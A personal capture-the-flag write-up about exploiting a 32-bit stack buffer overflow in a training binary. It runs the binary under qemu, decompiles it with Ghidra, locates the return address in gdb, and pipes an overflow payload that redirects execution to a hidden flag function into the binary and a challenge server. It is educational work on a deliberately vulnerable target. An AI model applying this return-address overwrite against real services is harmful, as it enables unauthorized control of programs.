Tackling the Buffer Overflow


I always kept a distance to buffer overflows. Maybe they’re too scary? I don’t know.
But you’ve got to learn new things, so here we go:

Hidden Flag Function

Can you control this applications flow to gain access to the hidden flag function?

Let’s run file over it:

file hidden_flag_function
hidden_flag_function: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=92825cdfbc5b108fc4cfe56d7c6636f837475d4e, not stripped

Okay, good it’s not stripped. The problem: it’s i386. Let’s fire up qemu?

Qemu is split into two modes: full system emulation and user mode emulation. While we needed for the Bootloader reversing the system emulator, we only need to run a simple program here.
I only got qemu system installed, but apparently there is no qemu-user for windows. Good thing I have WSL…

To install qemu user we only need:

sudo apt-get install qemu-user

Running it “transparently” means running it like a native executable with ./executable. This works through binfmt (which is kinda cool).

I was following this as a reference, but ./hidden_flag_function didn’t work.

-bash: ./hidden_flag_function: cannot execute binary file: Exec format error

qemu-i386 hidden_flag_function also gave a dependency error…

qemu-i386 hidden_flag_function
/lib/ld-linux.so.2: No such file or directory

To fix this I found this. TL;DR:

sudo apt install qemu-user-static
sudo update-binfmts --install i386 /usr/bin/qemu-i386-static --magic '\x7fELF\x01\x01\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x03\x00\x01\x00\x00\x00' --mask '\xff\xff\xff\xff\xff\xff\xff\xfc\xff\xff\xff\xff\xff\xff\xff\xff\xf8\xff\xff\xff\xff\xff\xff\xff'

sudo dpkg --add-architecture i386
sudo apt update
sudo apt install g++:i386

It gave some errors, but I can finally run the program.

Let’s look at the program in Ghidra:

undefined4 main(void)
  undefined *puVar1;
  puVar1 = &stack0x00000004;
  setbuf(stdout,(char *)0x0);
  puts("What do you have to say?");
  return 0;

So it calls chall():

void chall(void)
  int iVar1;
  undefined local_4c [68];
  iVar1 = __x86.get_pc_thunk.ax();
  __isoc99_scanf(iVar1 + 0x133,local_4c);

Okay, so I’ve never done this, but I now how it works in theory.
Also here a guide kinda thingy?
As it doesn’t call any other function, we probably have to overwrite the return address (which is thrown onto the stack %ebp).
The input is saved in eax + 0x133. 0x133 / 0x4 (char size) = 0x4C = 76

The flag function is at 0x08048576:

void flag(void)
  char local_50 [64];
  FILE *local_10;
  local_10 = fopen("flag.txt","r");
  printf("How did you get here?\nHave a flag!\n%s\n",local_50);

So we need to insert 0x76 0x85 0x04 0x08 into $ebp, so we can “return” to the flag function.

If we break at 0x80485fa (directly after ) with gdb by running qemu-i386-static -g 1234 hidden_flag_function, we can print out %ebp:

(gdb) target remote localhost:1234
(gdb) break *0x80485fa
(gdb) layout asm
(gdb) layout regs
(gdb) c
(gdb) x/8xb $ebp
0xffffdd78:     0x88    0xdd    0xff    0xff    0x4a    0x86    0x04    0x08

So $ebp+4 is the return address.

We can also see this better:

(gdb) x/a $ebp+4
0xffffdd7c:     0x804864a

The code at the address is:

0804864a    b8 00 00 00 00     MOV     EAX,0x0

Let’s do a buffer overflow:

python -c "print('a'*78+'\x76\x85\x04\x08')" | qemu-i386-static -g 1234 hidden_flag_function

If we look at this in gdb:

(gdb) x/s $ebp
0xffffdd78:     "aaaaaav\205\004\b"

(gdb) x/8xb $ebp
0xffffdd78:     0x61    0x61    0x61    0x61    0x61    0x61    0x76    0x85

Okay so we need two chars less, so the final command is:

python -c "print('a'*76+'\x76\x85\x04\x08')" | ./hidden_flag_function
What do you have to say?
How did you get here?
Have a flag!
qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Segmentation fault (core dumped)

Now let’s send that to the server:

python -c "print('a'*76+'\x76\x85\x04\x08')" | nc <IP> <PORT>
What do you have to say?
How did you get here?
Have a flag!

And we done did it.